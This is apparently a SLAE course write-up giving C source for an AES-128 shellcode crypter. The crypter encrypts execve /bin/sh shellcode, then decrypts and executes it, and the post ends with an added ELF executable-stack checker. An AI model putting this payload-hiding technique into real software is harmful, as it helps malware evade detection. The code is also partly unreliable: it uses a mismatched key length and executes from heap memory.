Assignment_7 – Custom Crypter

This post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-581

This task involves building a shellcode crypter/decrypter.
The C code below contains everything needed to encrypt and decrypt our shellcode:

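#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>             // malloc, free
#include <string.h>
#include <gcrypt.h>

#define ENCR 1                  // 1 to encrypt, 0 to decrypt
// NOTE: gcry_cipher_setkey() below is given a length of 16, but this literal is
// only 9 bytes including its NUL; the remaining key bytes are whatever follows
// it in memory, so the ciphertext depends on the build.
const char *key = "mysecret";   // Set password
uint8_t iniVector[16] = {0x05}; // Initialization vector: first byte 0x05, remaining 15 bytes zero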

static void myCrypt(int, size_t, uint8_t *);
uint8_t origShellCode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
#if !ENCR
uint8_t encrShellCode[] = "\xcd\xa4\xf1\x17\xd0\x0a\xcf\x89\x57\xb7\x60\xea\xcd\x74\xbe\xeb\x47\x7a\xdb\x18\xb0\x00\x3d\xc9\x14";
#endif

int main(){

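    size_t i;
    int ag = gcry_cipher_map_name("aes128");
    // Length is always taken from the plaintext; the ciphertext may contain NUL bytes
    size_t len = strlen((const char *)origShellCode);
    uint8_t *buff = malloc(len);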

    myCrypt(ag, len, buff);
#if ENCR
        for(i=0; i<len; i++){
            printf("\\x%02x", buff[i]);
        }
        printf("\n");
#else
        int (*ret)() = (int(*)())buff;
        printf("Running shellcode...\n");
        ret();
#endif

    free(buff);
    return 0;
}

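// Encrypts origShellCode or decrypts encrShellCode into buff, depending on ENCR
static void myCrypt(int algo, size_t len, uint8_t *buff){

        gcry_cipher_hd_t hd;
        // OFB is a stream mode, so len does not have to be a multiple of the block size
        gcry_cipher_open(&hd, algo, GCRY_CIPHER_MODE_OFB, 0);
        gcry_cipher_setkey(hd, key, 16);        // AES-128 takes a 16-byte key
        gcry_cipher_setiv(hd, iniVector, 16);

#if ENCR
        gcry_cipher_encrypt(hd, buff, len, origShellCode, len);
#else
        gcry_cipher_decrypt(hd, buff, len, encrShellCode, len);
#endif
        gcry_cipher_close(hd);
}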

In our example we will encrypt execve shellcode:

 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

Depending on the value of #define ENCR, the program will encrypt (define ENCR 1) the code pasted into origShellCode[] or decrypt (define ENCR 0) the code pasted into encrShellCode[].

I decided to use the gcrypt library for the encryption/decryption process.

Libgcrypt is a general purpose cryptographic library based on the code from GnuPG. It provides functions for all cryptographic building blocks: symmetric ciphers (AES, DES, Blowfish, CAST5, Twofish, SEED, Camellia, Arcfour), hash algorithms (MD4, MD5, RIPE-MD160, SHA-1, SHA-224, SHA-256, SHA-384, SHA-512, TIGER-192, Whirlpool), MACs (HMAC for all hash algorithms), public key algorithms (RSA, Elgamal, DSA, ECDSA), large integer functions, random numbers and a lot of supporting functions.

The encrypter/decrypter uses aes128 (Advanced Encryption Standard with a key length of 128 bits).
The password is hardcoded (mysecret).

Let's compile our code:
gcc megacrypter.c -o megacrypter -lgcrypt -fno-stack-protector -z execstack

and run it:
root@debian:/usr/local/src/SLAE/7_assigment# ./megacrypter

\xcd\xa4\xf1\x17\xd0\x0a\xcf\x89\x57\xb7\x60\xea\xcd\x74\xbe\xeb\x47\x7a\xdb\x18\xb0\x00\x3d\xc9\x14

The output of the encryptor is our encrypted shellcode.
Let's paste it in encrShellCode[] and change define ENCR to 0.

Recompile it:
root@debian:/usr/local/src/SLAE/7_assigment# gcc megacrypter.c -o megacrypter -lgcrypt -fno-stack-protector -z execstack

Then run it:



works fine!
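
Both build commands above pass -z execstack, which the linker records as the PF_X bit in the binary's PT_GNU_STACK program header. As an added example (not part of the original post), the checker below reads that bit from an ELF image so such builds can be flagged during review; stack_is_executable, make_sample and the 84-byte sample images are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK_TYPE 0x6474e551u /* p_type of the GNU stack-permissions header */
#define PF_X_FLAG 0x1u                /* p_flags bit: segment is executable */

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* 1 = executable stack requested, 0 = non-executable stack,
 * -2 = no PT_GNU_STACK header (the loader's default applies),
 * -1 = not a parseable little-endian ELF image. */
int stack_is_executable(const uint8_t *img, size_t n) {
    if (n < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1) return -1;
    int is64 = (img[4] == 2);
    if ((!is64 && img[4] != 1) || (is64 && (n < 64 || rd32(img + 36) != 0))) return -1;
    uint64_t phoff = rd32(img + (is64 ? 32 : 28));   /* e_phoff (low 32 bits) */
    uint64_t entsz = rd16(img + (is64 ? 54 : 42));   /* e_phentsize */
    uint64_t phnum = rd16(img + (is64 ? 56 : 44));   /* e_phnum */
    size_t flags_at = is64 ? 4 : 24;                 /* offset of p_flags in a phdr */
    if (entsz < (is64 ? 56u : 32u)) return -1;
    for (uint64_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + i * entsz;
        if (off > n || n - off < entsz) return -1;   /* header lies outside the image */
        if (rd32(img + off) == PT_GNU_STACK_TYPE)
            return (rd32(img + off + flags_at) & PF_X_FLAG) ? 1 : 0;
    }
    return -2;
}

/* Constructed sample: an ELF32 header followed by one PT_GNU_STACK program header. */
void make_sample(uint8_t out[84], uint32_t p_flags) {
    memset(out, 0, 84);
    memcpy(out, "\x7f" "ELF\x01\x01\x01", 7);        /* magic, ELFCLASS32, LSB, version 1 */
    out[28] = 52; out[42] = 32; out[44] = 1;         /* e_phoff, e_phentsize, e_phnum */
    for (int i = 0; i < 4; i++) {
        out[52 + i] = (uint8_t)(PT_GNU_STACK_TYPE >> (8 * i));  /* p_type */
        out[76 + i] = (uint8_t)(p_flags >> (8 * i));            /* p_flags */
    }
}

int main(void) {
    uint8_t rwx[84], rw[84];
    make_sample(rwx, 7);  /* PF_R|PF_W|PF_X, what -z execstack produces */
    make_sample(rw, 6);   /* PF_R|PF_W, a non-executable stack */
    printf("rwx: %d, rw: %d\n", stack_is_executable(rwx, 84), stack_is_executable(rw, 84));
    return 0;
}
```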

This is the last assignment of SLAE)
Many thanks to Vivek and the team at SecurityTube for the course!

